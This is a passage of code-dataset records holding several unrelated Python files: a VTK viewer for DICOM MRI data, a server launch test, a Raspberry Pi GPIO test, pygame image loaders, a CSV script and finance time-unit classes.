ydir = orientation[3:6]\n zdir = [0.0, 0.0, 0.0]\n\n vtk.vtkMath.Cross(xdir, ydir, zdir)\n\n matrix = vtk.vtkMatrix4x4()\n\n for i in range(3):\n matrix.SetElement(i, 0, xdir[i])\n matrix.SetElement(i, 1, ydir[i])\n matrix.SetElement(i, 2, zdir[i])\n matrix.SetElement(i, 3, position[i])\n\n ArrayDicom = np.zeros(ConstPixelDims, dtype = float)\n\n actTimeVector.append(int(actDicom.TriggerTime))\n\n ArrayDicom[actIndex, :, :] = actDicom.pixel_array\n actIndex += 1\n\n np.clip(resSlope * diffValGr / (winWidth - 1) * ArrayDicom + ((resIntercept - winCen) / (winWidth - 1) + 0.5) * diffValGr + minValGr,\n minValGr, maxValGr, out = ArrayDicom)\n\n listOfMaxCounts.append(len(sortEntries))\n listOfDicomArrays.append(ArrayDicom)\n listOfPixelDims.append(ConstPixelDims)\n listOfPixelSpacings.append(ConstPixelSpacing)\n listOfPlaneShapes.append(planeShape)\n listOfMatrices.append(matrix)\n\n\n for i in range(len(timeVectors)):\n actTimeVector = timeVectors[i]\n factor = 800.0 / actTimeVector[-1]\n\n for j in range(len(actTimeVector)):\n actTimeVector[j] = int(factor * actTimeVector[j])\n\n if len(actTimeVector) > 0:\n tempDiff = actTimeVector[1] - actTimeVector[0]\n if tempDiff < minDiff:\n minDiff = tempDiff\n minDiffAtPos = i\n\n return (listOfDicomArrays, listOfPixelDims, listOfPixelSpacings,\n listOfPlaneShapes, listOfMaxCounts, listOfMatrices, minDiffAtPos,\n timeVectors)\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef getAllVTKDataLists(listOfDicomArrays):\n\n resultList = []\n\n for ArrayDicom in listOfDicomArrays:\n VTK_dataList = []\n\n for actImage in range(len(ArrayDicom)):\n VTK_dataList.append(vtknp.numpy_to_vtk(ArrayDicom[actImage].ravel(),deep=True, array_type=vtk.VTK_FLOAT))\n\n resultList.append(VTK_dataList)\n\n return resultList\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef readDynpt():\n f = open(pathIn + \"simulation/x.dynpt\", 'rb')\n header = dict(re.findall(r\"(\\w*):(\\w*)\", f.read(1024).decode('utf-8')))\n\n shapeTest = [int(header['t']), int(header['x']), 3]\n\n data = np.fromfile(f, dtype=np.float32)\n\n if header['unites_x'] == \"um\":\n data /= 1000\n\n return(header, data.reshape(shapeTest))\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\ndef getModelPosition():\n minZPos = float(\"inf\")\n\n for dirName, subdirList, fileList in os.walk(pathIn + \"segmentation\"):\n for filename in fileList:\n if \".dcm\" in filename.lower():\n actDs = dicom.read_file(os.path.join(dirName, filename))\n actZPos = actDs.ImagePositionPatient[2]\n\n if actZPos < minZPos:\n minZPos = actZPos\n\n return [actDs.ImagePositionPatient[0], actDs.ImagePositionPatient[1], minZPos]\n\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\nif platform.platform()[0] == \"W\":\n print(\"OS: win\")\n pathIn = \"c:/users/vch/desktop/Bredies/CASE01/\"\n pathIn = \"c:/users/vch/Desktop/ILHgit/\"\n\nelse:\n print(\"OS: not win\")\n pathIn = \"/home/horakv/Desktop/Bredies/CASE01/\"\n pathIn = \"/home/horakv/Desktop/ILHgit/\"\n\n\nseriesList = []\n\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111835162.607/\") # 40\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111848390.608/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9111901895.609/\") # 
25*16\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112235900.610/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112254187.611/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9112308236.612/\") # 25\nseriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9114136191.628/\") # 40\n#seriesList.append(\"cine/Visit_1___MRI_Data_and_Images_14d/Smart-1.3.6.1.4.1.16787.100.1.2.20160613.9114329783.631/\") # 40\n\n#t0 = time.time()\n\n\n\n\n\npathResult = \"/home/horakv/Desktop/results/withCushion\"\n\n\n\nDTWmatrix = np.load(\"{}matrix15.npy\".format(pathResult))\n\nn, m = DTWmatrix.shape\n\nprint(DTWmatrix.shape, n, m)\n\nDTW = np.full((n+1, m+1), np.inf)\n\n\n#s: array [1..n], t: array [1..m]) {\n#DTW := array [0..n, 0..m]\n\n\nDTW[0][0] = 0\n\nfor i in range(1, n):\n for j in range(1, m):\n DTW[i][j] = DTWmatrix[i][j] + min(DTW[i-1][j], DTW[i][j-1], DTW[i-1][j-1])\n\nb, a = n - 1, m - 1\nDTWpath = []\n\nwhile (b, a) != (0, 0):\n DTWpath.append((a, b))\n b, a = min((b - 1, a), (b, a - 1), (b - 1, a - 1), key=lambda x: DTW[x[0], x[1]])\n\nDTWpath.append((0, 0))\n\n\nDTWpath.sort()\n\n\n\nmin((i, DTWpath[i]) for i in range(len(DTWpath)) )\n\n#cost, path = DTW(matrix)\nprint(DTWpath)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n(listOfDicomArrays, listOfPixelDims, listOfPixelSpacings,\n listOfPlaneShapes, listOfMaxCounts, listOfMatrices, minDiffAtPos,\n timeVectors) = readFilesToDicomArray(pathIn, seriesList)\n\n#t1 = time.time()\n\n#print(\"Zeit:\", t1-t0)\n\n#updateVectors = calcUpdateVector(timeVectors, minDiffAtPos)\nupdateVectors = DTWcalcUpdateVector(timeVectors, minDiffAtPos)\n\nnumSlices = len(timeVectors)\nnumTimeSteps = len(timeVectors[minDiffAtPos])\n\nnumImages = len(listOfDicomArrays)\n\n###############################\n# place for data manipulation #\n###############################\n\n\nlistOfVTKDataLists = getAllVTKDataLists(listOfDicomArrays)\n\n#########################################################\n\nren = vtk.vtkRenderer()\nren.SetBackground(0.8, 0.8, 0.8)\n\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetSize(1000, 1000)\n\nrenWin.AddRenderer(ren)\n\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n#############################\n# =============================================================================\n# axes = vtk.vtkAxesActor()\n# widget = vtk.vtkOrientationMarkerWidget()\n# widget.SetOrientationMarker(axes)\n# widget.SetInteractor(iren)\n# widget.SetEnabled( 1 )\n# widget.InteractiveOn()\n# =============================================================================\n#############################\n\n\nlookupTable = vtk.vtkLookupTable()\nlookupTable.SetNumberOfTableValues(256)\nlookupTable.SetRange(0.0, 255.0)\nfor j in range(256):\n lookupTable.SetTableValue(j, j/255.0, j/255.0, j/255.0, min(j/25.5, 1.0))\nlookupTable.Build()\n\nimages = []\n\nfor actImage in range(numImages):\n image = vtk.vtkImageData()\n image.SetDimensions(listOfPlaneShapes[actImage])\n image.SetSpacing(listOfPixelSpacings[actImage][0], listOfPixelSpacings[actImage][1], 0.0)\n\n image.AllocateScalars(vtk.VTK_FLOAT, 1)\n image.GetPointData().SetScalars(listOfVTKDataLists[actImage][0])\n\n images.append(image)\n\n mapTransparency = vtk.vtkImageMapToColors()\n mapTransparency.SetLookupTable(lookupTable)\n mapTransparency.PassAlphaToOutputOn()\n 
mapTransparency.SetInputData(image)\n\n mapper = vtk.vtkDataSetMapper()\n mapper.SetInputConnection(mapTransparency.GetOutputPort())\n mapper.SetColorModeToDirectScalars()\n\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetInterpolationToFlat()\n actor.GetProperty().ShadingOff()\n actor.GetProperty().LightingOff()\n actor.SetUserMatrix(listOfMatrices[actImage])\n\n ren.AddActor(actor)\n\n\n\n###############################################################################\n# Struktur des Modells einlesen\n###############################################################################\n\nfilenames = glob.glob(pathIn + 'mesh/*.vtk')\n\nreader = vtk.vtkUnstructuredGridReader()\nreader.SetFileName(filenames[0])\n\ngeometryFilter = vtk.vtkGeometryFilter()\ngeometryFilter.SetInputConnection(reader.GetOutputPort())\ngeometryFilter.Update()\n\npolydata = geometryFilter.GetOutput()\nscalarRange = polydata.GetScalarRange()\n\nactMesh = vtknp.vtk_to_numpy(polydata.GetPoints().GetData())\nactMesh /= 1000 # Daten sind in um statt in mm gegeben -> Korrektur\n\n\n###############################################################################\n# Verschiebungen vorbereiten und Visualisierung\n###############################################################################\n\n(header, displacements) = readDynpt()\n\nmaxCount = len(displacements)\n\nmMapper = vtk.vtkPolyDataMapper()\nmMapper.SetInputData(polydata)\nmMapper.SetScalarRange(scalarRange)\n\n\n\nmActor = vtk.vtkActor()\nmActor.SetMapper(mMapper)\nmActor.SetPosition(getModelPosition())\n\nmActor.GetProperty().SetOpacity(0.2)\n\nif scalarRange == (0.0, 1.0):\n mMapper.ScalarVisibilityOff()\n mActor.GetProperty().SetColor(1,0,0)\n\nren.AddActor(mActor)\n\n###############################################################################\n\niren.Initialize()\niren.AddObserver('TimerEvent', timer_callback)\niren.CreateRepeatingTimer(10)\n\n\nrenWin.Render()\nprint(\"Start\")\niren.Start()\n\n\nif platform.platform()[0] != \"W\":\n close_window(iren)\n del renWin, iren\n","sub_path":"DTWdicomModel2position.py","file_name":"DTWdicomModel2position.py","file_ext":"py","file_size_in_byte":15408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"180054473","text":"import os\n\ntry:\n import _thread\nexcept ImportError:\n import _dummy_thread as _thread\n\nfrom Costants import PORT\nfrom ServerLaunchThread import ServerLaunchThread\n\nos.chdir('..')\nos.chdir('..')\nos.chdir('..')\n\nprint(os.getcwd())\n\nos.chdir('Binaries')\nos.chdir('Win32')\n\nNUM_SERVER = 10\n\nMAX_GAMESPEED = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nthreads = []\n\nfor i in range(NUM_SERVER):\n threads.append(ServerLaunchThread(i, \"Thread-\" + str(i), MAX_GAMESPEED[i], PORT[i], 2400))\n\nfor thread in threads:\n thread.start()","sub_path":"client/testing/TestSpeedServerLaunch.py","file_name":"TestSpeedServerLaunch.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"20026214","text":"try:\n import RPi.GPIO as GPIO\nexcept(ImportError):\n print(\"Failed to import RPI. 
Aborting.\")\n\nimport time\n\nclass IO:\n def __init__(self):\n GPIO.setmode(GPIO.BCM)\n self.OutputList = [[\"A\", 26],\n [\"B\", 24],\n [\"C\", 22],\n [\"D\", 23],\n [\"E\", 21],\n [\"F\", 19],\n [\"G\", 16],\n [\"H\", 18]]\n self.InputList = [[]]\n self.Initial = True\n if self.Initial == True:\n self.SetupIO()\n\n def SetupIO(self):\n for count in range(0, len(self.OutputList)):\n GPIO.setup(self.OutputList[count][1], GPIO.OUT, initial=GPIO.LOW)\n time.sleep(0.5)\n\n def InitialTest(self):\n print(\"Beginning initial output test...\")\n for count in range(0, len(self.OutputList)):\n for count in range(0,2):\n print(\"Output: {}\".format(self.OutputList[count][0]))\n GPIO.output(self.OutputList[count][1], GPIO.HIGH)\n time.sleep(0.25)\n GPIO.output(self.OutputList[count][1], GPIO.LOW)\n print(\"Complete.\")\n\n def ManualControl(self):\n print(\"\"\"\"\"\")\n\n\n\nIO = IO()\nIO.InitialTest()\n\n\n","sub_path":"AES_Master/AES 4.3/IOTestingUtility.py","file_name":"IOTestingUtility.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619908299","text":"from src.consts import *\nfrom pygame.image import load\n\n\nclass ConverterBase:\n \"\"\"画像変換基底クラス\"\"\"\n _instance = None\n\n def __new__(cls, converter=None):\n if cls._instance is None:\n cls._instance = super().__new__(cls)\n\n return cls._instance\n\n def __init__(self, converter):\n self.converter = converter\n\n def get_converter(self):\n return self.converter\n\n\nclass MapImage(ConverterBase):\n \"\"\"マップ画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {SEA: load(PATH_SEA).convert(),\n SAND: load(PATH_SAND).convert(),\n GLASS: load(PATH_GLASS).convert(),\n FOREST: load(PATH_FOREST).convert(),\n MOUNTAIN: load(PATH_MOUNTAIN).convert(),\n RIVER: load(PATH_RIVER).convert()}\n super().__init__(converter)\n\n\nclass PlayerImage(ConverterBase):\n \"\"\"プレーヤー画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {DIRECTION_UP: load(PATH_IMAGE_PLAYER_UP).convert_alpha(),\n DIRECTION_RIGHT: load(PATH_IMAGE_PLAYER_RIGHT).convert_alpha(),\n DIRECTION_DOWN: load(PATH_IMAGE_PLAYER_DOWN).convert_alpha(),\n DIRECTION_LEFT: load(PATH_IMAGE_PLAYER_LEFT).convert_alpha()}\n super().__init__(converter)\n\n\nclass NationImage(ConverterBase):\n \"\"\"国家画像変換クラス\"\"\"\n\n def __init__(self):\n converter = {NATION_LEVEL_VILLAGE: load(PATH_IMAGE_VILLAGE).convert_alpha(),\n NATION_LEVEL_TOWN: load(PATH_IMAGE_TOWN).convert_alpha(),\n NATION_LEVEL_CASTLE_TOWN: load(PATH_IMAGE_CASTLE_TOWN).convert_alpha(),\n NATION_LEVEL_CASTLE: load(PATH_IMAGE_CASTLE).convert_alpha()}\n super().__init__(converter)\n","sub_path":"src/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414403145","text":"import csv\nimport re\n\n\ndef read():\n with open('aa.csv', 'r', encoding='utf8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n title,link,*rest=row\n host, href = link.rsplit('/', 1)\n chapter_num = re.search('第(\\d+)話', title).groups()[0]\n print(f'move {href} {chapter_num:0>6}')\n print(', '.join(row))\n\ndef write():\n # writer\n import csv\n with open('csv/some.csv', 'w') as csvfile:\n header_columns = ['word', 'count', 'timestamp']\n writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n writer.writeheader()\n writer. 
writerow({\n \"count\": count,\n \"word\": word,\n \"timestamp\": timestamp\n })\n","sub_path":"python_01/csv_operate.py","file_name":"csv_operate.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295760514","text":"import re\nimport time\nimport threading\nimport calendar\nfrom datetime import datetime, date, timedelta\nimport math\nimport collections\nimport common_definition as CMN_DEF\nfrom libs.common.common_variable import GlobalVar as GV\nimport common_function as CMN_FUNC\n\nMonthTuple = collections.namedtuple('MonthTuple', ('year', 'month'))\nQuarterTuple = collections.namedtuple('QuarterTuple', ('year', 'quarter'))\nTimeDurationTuple = collections.namedtuple('TimeDurationTuple', ('time_duration_start', 'time_duration_end'))\nScrapyClassTimeDurationTuple = collections.namedtuple('ScrapyClassTimeDurationTuple', ('scrapy_class_index', 'time_duration_type', 'time_duration_start', 'time_duration_end'))\nScrapyClassCompanyTimeDurationTuple = collections.namedtuple('ScrapyClassCompanyTimeDurationTuple', ('scrapy_class_index', 'company_code_number', 'time_duration_type', 'time_duration_start', 'time_duration_end'))\n\nsingleton_thread_lock = threading.Lock()\n\n\nclass Singleton:\n \"\"\"\n A non-thread-safe helper class to ease implementing singletons.\n This should be used as a decorator -- not a metaclass -- to the class that should be a singleton.\n\n The decorated class can define one `__init__` function that takes only the `self` argument. Other than that, there are\n no restrictions that apply to the decorated class.\n\n To get the singleton instance, use the `Instance` method. Trying to use `__call__` will result in a `TypeError` being raised.\n\n Limitations: The decorated class cannot be inherited from.\n\n \"\"\"\n\n def __init__(self, decorated):\n self._decorated = decorated\n\n\n def Instance(self, cfg=None):\n \"\"\"\n Returns the singleton instance. 
Upon its first call, it creates a\n new instance of the decorated class and calls its `__init__` method.\n On all subsequent calls, the already created instance is returned.\n\n \"\"\"\n try:\n return self._instance\n except AttributeError:\n with singleton_thread_lock:\n try:\n return self._instance\n except AttributeError:\n # import pdb; pdb.set_trace()\n self._instance = self._decorated() # Call __init__() of the class\n if hasattr(self._instance, \"initialize\"):\n if cfg is None:\n self._instance.initialize()\n else:\n self._instance.initialize(**cfg)\n return self._instance\n\n\n def __call__(self):\n raise TypeError('Singletons must be accessed through Instance()')\n\n\n def __instancecheck__(self, inst):\n return isinstance(inst, self._decorated)\n\n#############################################################################################\n\nclass FinanceTimeBase(object):\n\n def __init__(self):\n self.year = None\n self.republic_era_year = None\n pass\n\n\n def to_string(self):\n raise NotImplementedError\n\n\n def get_value(self):\n raise NotImplementedError\n\n\n def get_value_tuple(self):\n raise NotImplementedError\n\n\n def check_continous_time_duration(self, another_time_duration):\n raise NotImplementedError\n\n\n def get_year(self):\n assert (self.year is not None), \"year value should NOT be None\"\n return self.year\n\n\n def get_republic_era_year(self):\n assert (self.republic_era_year is not None), \"republic_era_year value should NOT be None\"\n return self.republic_era_year\n\n\n def setup_year_value(self, year_value):\n if CMN_FUNC.is_republic_era_year(year_value):\n self.republic_era_year = int(year_value)\n self.year = self.republic_era_year + CMN_DEF.REPUBLIC_ERA_YEAR_OFFSET\n else:\n self.year = int(year_value)\n self.republic_era_year = self.year - CMN_DEF.REPUBLIC_ERA_YEAR_OFFSET\n\n\n def check_continous_time_duration(self, another_time_duration):\n return CMN_FUNC.is_continous_time_duration(self, another_time_duration)\n\n\n @staticmethod\n def get_time_unit_type():\n # \"\"\"IMPORTANT: This is a static method, override it with @staticmethod !\"\"\"\n raise NotImplementedError\n\n\n @classmethod\n def from_string(cls, time_string):\n # \"\"\"IMPORTANT: This is a class method, override it with @classmethod !\"\"\"\n raise NotImplementedError\n\n\n @staticmethod\n def from_time_string(time_string, time_unit=None):\n time_obj = None\n # import pdb; pdb.set_trace()\n if time_unit is None:\n# Detect time unit from the time string format\n if CMN_FUNC.is_date_str_format(time_string):\n time_obj = FinanceDate.from_string(time_string)\n elif CMN_FUNC.is_week_str_format(time_string):\n time_obj = FinanceWeek.from_string(time_string)\n elif CMN_FUNC.is_month_str_format(time_string):\n time_obj = FinanceMonth.from_string(time_string)\n elif CMN_FUNC.is_quarter_str_format(time_string):\n time_obj = FinanceQuarter.from_string(time_string)\n elif CMN_FUNC.is_year_str_format(time_string):\n time_obj = FinanceYear.from_string(time_string)\n else:\n raise ValueError(\"Unknown time format: %s\" % time_string)\n else:\n if time_unit == CMN_DEF.DATA_TIME_UNIT_DAY:\n time_obj = FinanceDate(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_WEEK:\n time_obj = FinanceWeek(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_MONTH:\n time_obj = FinanceMonth(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_QUARTER:\n time_obj = FinanceQuarter(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_YEAR:\n time_obj = FinanceYear(time_string)\n else:\n raise 
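# --- illustrative sketch, not part of the scraped file above ---
# Intended use of the Singleton decorator defined earlier: always go through
# Instance(); the first call constructs the object under singleton_thread_lock
# (double-checked), later calls return the same object, and calling the class
# directly raises TypeError. The same access pattern in miniature:
import threading

class _LazyBox(object):
    _instance = None
    _lock = threading.Lock()

    @classmethod
    def instance(cls):
        if cls._instance is None:          # first, a lock-free check
            with cls._lock:                # then double-check under the lock
                if cls._instance is None:
                    cls._instance = cls()
        return cls._instance

assert _LazyBox.instance() is _LazyBox.instance()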
ValueError(\"Unsupport time unit[%d] for transform\" % time_unit)\n return time_obj\n\n\n # @staticmethod\n # def date_str_to_time_obj(date_string, time_unit):\n # CMN_FUNC.check_date_str_format(time_string)\n # time_obj = None\n # # import pdb; pdb.set_trace()\n # if time_unit == CMN_DEF.DATA_TIME_UNIT_WEEK:\n # time_obj = CMN.CLS.FinanceMonth(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_MONTH:\n # time_obj = CMN.CLS.FinanceMonth(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_QUARTER:\n # time_obj = CMN.CLS.FinanceQuarter(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_YEAR:\n # time_obj = CMN.CLS.FinanceYear(time_str)\n # else:\n # raise ValueError(\"Unsupport time unit[%d] for transform\" % time_unit)\n # return time_obj\n\n\n\n def __str__(self):\n return self.to_string()\n\n\n def __lt__(self, other):\n return self.get_value() < other.get_value()\n\n\n def __le__(self, other):\n return self.get_value() <= other.get_value()\n\n\n def __eq__(self, other):\n return self.get_value() == other.get_value()\n\n\n def __ne__(self, other):\n return self.get_value() != other.get_value()\n\n\n def __gt__(self, other):\n return self.get_value() > other.get_value()\n\n\n def __ge__(self, other):\n return self.get_value() >= other.get_value()\n\n\nclass FinanceDate(FinanceTimeBase):\n\n today_finance_date = None\n last_finance_date = None\n def __init__(self, *args):\n super(FinanceDate, self).__init__()\n self.month = None # range: 1 - 12\n self.day = None # range: 1 - last date of month\n self.date_str = None\n self.datetime_cfg = None\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_date_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.month = int(mobj.group(2))\n self.day = int(mobj.group(3))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceDate):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.month = args[0].month\n self.day = args[0].day\n else:\n format_unsupport = True\n elif len(args) == 3:\n for index in range(3):\n if type(args[index]) is not int:\n format_unsupport = True\n self.setup_year_value(args[0])\n # self.year = args[0]\n self.month = args[1]\n self.day = args[2]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceDate, due to: %s\" % str(e))\n# Check value range\n FinanceDate.check_value_range(self.year, self.month, self.day)\n\n\n @staticmethod\n def check_value_range(year, month, day):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Month Range\n CMN_FUNC.check_month_range(month)\n# Check Day Range\n CMN_FUNC.check_day_range(day, year, month)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_DAY\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n @classmethod\n def get_today_finance_date(cls):\n if cls.today_finance_date is None:\n cls.today_finance_date = FinanceDate(datetime.today())\n return cls.today_finance_date\n\n\n @classmethod\n def get_last_finance_date(cls):\n if cls.last_finance_date is None:\n today_data_exist_hour = CMN_DEF.TODAY_DATA_EXIST_HOUR # if GV.IS_FINANCE_MARKET_MODE else CMN_DEF.TODAY_STOCK_DATA_EXIST_HOUR\n today_data_exist_minute = CMN_DEF.TODAY_DATA_EXIST_MINUTE # if 
GV.IS_FINANCE_MARKET_MODE else CMN_DEF.TODAY_STOCK_DATA_EXIST_HOUR\n cls.last_finance_date = CMN_FUNC.get_last_url_data_date(today_data_exist_hour, today_data_exist_minute) \n return cls.last_finance_date\n\n\n def __add__(self, day_delta):\n # if not isinstance(delta, timedelta):\n # raise TypeError('The type[%s] of the other variable is NOT timedelta' % type(delta))\n if not isinstance(day_delta, int):\n raise TypeError('The type[%s] of the day_delta argument is NOT int' % type(day_delta))\n return FinanceDate(self.to_datetime() + timedelta(days = day_delta))\n\n\n def __sub__(self, day_delta):\n # if not isinstance(delta, timedelta):\n # raise TypeError('The type[%s] of the other variable is NOT timedelta' % type(delta))\n if not isinstance(day_delta, int):\n raise TypeError('The type[%s] of the day_delta argument is NOT int' % type(day_delta))\n return FinanceDate(self.to_datetime() - timedelta(days = day_delta))\n\n\n def to_string(self):\n if self.date_str is None:\n self.date_str = CMN_FUNC.transform_date_str(self.year, self.month, self.day)\n return self.date_str\n\n\n def get_value(self):\n return (self.year << 12 | self.month << 8 | self.day)\n\n\n def get_value_tuple(self):\n return (self.year, self.month, self.day)\n\n\n def to_datetime(self):\n if self.datetime_cfg is None:\n self.datetime_cfg = datetime(self.year, self.month, self.day)\n return self.datetime_cfg\n\n\n @staticmethod\n def is_same_month(finance_date1, finance_date2):\n return (True if FinanceMonth(finance_date1.year, finance_date1.month) == FinanceMonth(finance_date2.year, finance_date2.month) else False)\n\n\nclass FinanceWeek(FinanceTimeBase):\n\n @classmethod\n def date_to_weekofyear(cls, year, month, day):\n year, weekofyear, weekday = date(year, month, day).isocalendar()\n return (year, weekofyear, weekday)\n\n\n @classmethod\n def weekofyear_to_date(cls, year, weekofyear, weekday=0):\n# The first day of the week '0': Sunday \n# The second day of the week '1': Monday\n# ...\n # import pdb; pdb.set_trace()\n week_str = CMN_FUNC.transform_week_str(year, weekofyear) + '-%d' % weekday\n date_obj = datetime.strptime(week_str, \"%Yw%W-%w\")\n return (date_obj.year, date_obj.month, date_obj.day)\n\n\n @classmethod\n def get_finance_week_from_date(cls, *week_args):\n \"\"\" Find the finance week due to the specific finance date\"\"\"\n \n year = None\n month = None\n day = None\n if isinstance(week_args[0], FinanceDate):\n pass\n elif isinstance(week_args[0], int) and len(week_args) == 3:\n pass\n else:\n raise ValueError(\"UnSupport input argument: %s\" % week_args)\n return cls(*week_args)\n\n\n def __init__(self, *args):\n super(FinanceWeek, self).__init__()\n self.year = None # range: 2000 - 2099\n self.weekofyear = None\n self.weekday = 0\n self.week_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n if CMN_FUNC.is_date_str_format(args[0]):\n mobj = CMN_FUNC.check_date_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n month = int(mobj.group(2))\n day = int(mobj.group(3))\n _, self.weekofyear, self.weekday = self.date_to_weekofyear(self.year, month, day)\n elif CMN_FUNC.is_week_str_format(args[0]):\n mobj = CMN_FUNC.check_week_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n self.weekofyear = int(mobj.group(2)) \n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceDate):\n self.setup_year_value(args[0].year)\n _, self.weekofyear, self.weekday = 
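# --- illustrative sketch, not part of the scraped file above ---
# date_to_weekofyear/weekofyear_to_date above convert between a calendar date
# and a (year, week) pair: one direction via date.isocalendar(), the other by
# formatting a week string and parsing it back with the "%W-%w" directives.
# A standalone round trip for a mid-year Monday (the week string is built
# directly here rather than via the file's transform_week_str helper):
from datetime import date, datetime

d = date(2016, 6, 13)                              # a Monday
iso_year, iso_week, iso_weekday = d.isocalendar()  # -> (2016, 24, 1)

# %W numbers weeks from the first Monday of the year and %w is the weekday
# (0 = Sunday), so this agrees with ISO weeks here but can drift near Jan 1 -
# worth keeping in mind when mixing the two schemes the way the class does.
roundtrip = datetime.strptime("2016w24-1", "%Yw%W-%w").date()
assert roundtrip == d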
self.date_to_weekofyear(self.year, args[0].month, args[0].day)\n elif isinstance(args[0], FinanceWeek): \n self.year = args[0].year\n self.weekofyear = args[0].weekofyear\n self.weekday = args[0].weekday\n else:\n format_unsupport = True\n elif len(args) == 2:\n if isinstance(args[0], int):\n self.setup_year_value(args[0])\n self.weekofyear = args[1]\n else:\n format_unsupport = True\n elif len(args) == 3:\n if isinstance(args[0], int):\n self.setup_year_value(args[0])\n _, self.weekofyear, self.weekday = self.date_to_weekofyear(self.year, args[1], args[2])\n else:\n format_unsupport = True\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceYear, due to: %s\" % str(e))\n# Check value range\n CMN_FUNC.check_year_range(self.year)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_WEEK\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __add__(self, week_delta):\n if not isinstance(week_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(week_delta))\n year, month, day = self.weekofyear_to_date(self.year, self.weekofyear, self.weekday)\n new_datetime = datetime(year, month, day) + timedelta(days = week_delta * 7)\n return FinanceWeek(new_datetime.year, new_datetime.month, new_datetime.day)\n\n\n def __sub__(self, week_delta):\n if not isinstance(week_delta, int):\n raise TypeError('The type[%s] of the week_delta argument is NOT int' % type(week_delta))\n year, month, day = self.weekofyear_to_date(self.year, self.weekofyear, self.weekday)\n new_datetime = datetime(year, month, day) - timedelta(days = week_delta * 7)\n return FinanceWeek(new_datetime.year, new_datetime.month, new_datetime.day)\n\n\n def to_string(self):\n if self.week_str is None:\n self.week_str = CMN_FUNC.transform_week_str(self.year, self.weekofyear)\n return self.week_str\n\n\n def get_value(self):\n return (self.year << 3 | self.weekofyear)\n\n\n def get_value_tuple(self):\n return (self.year, self.weekofyear,)\n\n\nclass FinanceMonth(FinanceTimeBase):\n\n @classmethod\n def get_finance_month_from_date(cls, *date_args):\n \"\"\" Find the finance month due to the specific finance date\"\"\"\n \n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n\n return cls(finance_date.year, finance_date.month)\n\n\n def __init__(self, 